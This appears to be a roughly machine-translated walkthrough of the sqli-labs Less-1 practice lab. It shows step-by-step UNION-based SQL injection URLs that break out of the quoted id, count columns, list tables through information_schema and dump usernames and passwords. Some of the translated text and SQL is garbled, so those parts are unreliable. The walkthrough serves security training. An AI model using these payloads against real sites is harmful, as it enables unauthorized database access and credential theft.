MySQL inject explaining

SqlliabLess1

First look at the source code

We found that the field of the ID was dropped directly to the query SQL statement function. Enter an address to see the effect

Http://192.168.16.135/sqli-labs-master/Less-1/?id=1

We find that when id=1, the current execution statement is:

SELECT * from Users WHERE id= ' 1 ' LIMIT 0,1

We first try to judge the common approach of SQL injection: Add a ' try Effect

Http://192.168.16.135/sqli-labs-master/Less-1/?id=1 '

Found will be an error, why the error, we can clearly see the SQL injection execution statement is:

SELECT * from Users WHERE id= ' 1 ' LIMIT 0,1

Because id= ' 1 ', this is a wrong SQL statement, so there will be an error message.

We're here to try another way of judging the injection point: and 1=1 and and 1=2

Enter And1=1 first

Http://192.168.16.135/sqli-labs-master/Less-1/?id=1 and 1=1

Found executed statement SELECT * from users WHERE id= ' 1 and 1=1 ' LIMIT 0,1

We found that 1 and 1=1 as the value of the ID are queried by the incoming SQL statement, no matter how the query results are just the value of ID as 1. Enter and 1=3 to see.

Http://192.168.16.135/sqli-labs-master/Less-1/?id=1 and 1=3

How do you get SQL statements to execute an and statement? Can you find that the contents of the ID are not strings, we can try to close the string.

Http://192.168.16.135/sqli-labs-master/Less-1/?id=1 ' and 1 = ' 10% have a closed field, looking at the contents of and1=2

Http://192.168.16.135/sqli-labs-master/Less-1/?id=1 ' and 1 = ' 2

We found that the page feedback effect of executing and1=1 and performing and1=2 was different, indicating that there was a SQL injection point.

Using the Order By field, you find that the SQL statement executed is:

SELECT * from the Users WHERE id= ' 1 order by 9 ' LIMIT 0,1

The discovery and execution of an and is a truth, except that in executing and the statement is that I did not truncate the SQL statement (a little bit of a problem in the idea of this article), in the normal SQL injection process, if we find that there is a real SQL injection point. We should truncate the SQL statement, which is "LIMIT 0,1" in this article. Kill the extra parts of the SQL statement. So the question is, how do we get rid of the back part? Is there a point of thinking?

Note, right is the comment you have no mistake, there are three types of comments in the SQL statement, namely #,/**/,--。

First, the meaning of these three types of annotations

The Select ID from user # represents the end of this SQL statement, and the usual term line comment.

Select ID from user--Indicates that the statement ends here, often with multiple lines of comment. Here's the idea--double-switching requires at least one space before and after the space in the SQL statement with the + representation.

/* Note The SQL statement's/* is usually used for large segment comments.

First we'll take out the extra SQL statements.

Http://192.168.16.135/sqli-labs-master/Less-1/?id=1 '--+, normal return page, stating that the limit 0,1 after SQL was killed.

Execute Statement http://192.168.16.135/sqli-labs-master/Less-1/?id=1 ' #

It's going to be a whole lot of bad, why? Look at the SQL statement executed:

SELECT * from Users WHERE id= ' 1 ' LIMIT 0,1

The explanation is not killed, then how to do? One of the most common uses of SQL injection is coding, which is a problem with URL coding. Common URL encoding% 20 for space,%23 means #, say a problem, URL and 16 binary have a similar place is%23 and 0x23. It's all about the #. Interested can go on to study it.

Http://192.168.16.135/sqli-labs-master/Less-1/?id=1 '% 23, return to normal.

Judging field Lengths

Oder by principle

When there are three fields in the T1 table, we use a query statement,

Select * from t1 where ID =1 ORDER by 3, returns normal data.

Using the SELECT * from t1 where ID =1 the order by 4, the SQL statement was found to be an error, and the returned field was not found.

When the T1 table has four fields, use a query statement

Select * from T1 the where ID =1 order by 4, returns the data.

Select * from t1 where ID =1 order by 5,

Returns an error. This means that order by is to determine how many columns are in the table. If there are 3 columns in the table, then order by 3 queries to the data, and if order by 4, the table does not have 4 columns of data, error. Familiar with the principle to see the use of the process.

Http://192.168.16.135/sqli-labs-master/Less-1/?id=1 ' ORDER by 9%23

Found unknown column ' 9 ' in ' order clause ', stating that the field does not exist. Use dichotomy to judge the other numbers.

Http://192.168.16.135/sqli-labs-master/Less-1/?id=1 ' ORDER by 3%23 found 3 pages.

Http://192.168.16.135/sqli-labs-master/Less-1/?id=1 ' ORDER by 4%23

If 4 is not found, then only 3 fields are indicated.

Next is the query field, which uses the union select to query the principle. The execution id=1 returns to normal,

Execution-1 Returns an empty field.

Execute-1 Union Select 1, return name

We can understand that.

Select name FROMT1 where ID =-1 this statement executes a null result

Uninon Select 1 This statement can query the results, return the query to the page number.

How to use it? It is also said that as long as we make the result of the SQL statement preceding the union empty. To have the page show the results of the SQL statements that follow the Union. We use and to verify.

Select name FROMT1 where ID =1 and 1=1, and finds that a field is returned.

Select name FROMT1 where ID =1 and 1=2, finding the result of the query to be empty

Select name FROMT1 where ID =1 and 1=2 Union select 1,

Use a federated query to query to the data.

Familiar with the principle of federated query. Let's get the field in the page using a federated query.

Http://192.168.16.135/sqli-labs-master/Less-1/?id=-1 ' Union Select 1,2,3%23

Take a look at the SQL statement executed:

SELECT * Fromusers WHERE id= '-1 ' union select 1,2,3#

Note: The Execute SQL statement in is incorrect because we used the # comment later, #后面的内容已被sql过滤. In other words, the thing behind it is empty.

We found that 2, 32 fields were returned in the page. Next, use the fields displayed on the page to determine the SQL version and database.

Http://192.168.16.135/sqli-labs-master/Less-1/?id=-1 ' Union Select 1,version (), database ()%23

Found MySQL version is 5.5.53>5.0, more than 5.0 version of MySQL has a database information_schema this database to store all the operations with MySQL. We see a table in Information_schema that is tables, which stores all the properties of the table.

Stores all information about the column in columns.

Http://192.168.16.135/sqli-labs-master/Less-1/?id=-1 ' Union SELECT, GROUP_CONCAT (table_name) from Information_ Schema.tables wheretable_schema= ' security '% 23, get table name

You can also use

Http://192.168.16.135/sqli-labs-master/Less-1/?id=-1 ' Union SELECT, GROUP_CONCAT (table_name) from Information_ Schema.tables wheretable_schema=database ()%23

Get the column name, as an example of the Users table.

Http://192.168.16.135/sqli-labs-master/Less-1/?id=-1 ' Union Select 1,version (), Group_concat (column_name) from Information_schema.columnswhere table_name= ' users '%23

Get the data.

Http://192.168.16.135/sqli-labs-master/Less-1/?id=-1 ' Union Select 1,version (), Group_concat (Username,password) From users%23

Gets the user name and password for the management of the database. So what do we do next?

MySQL inject explaining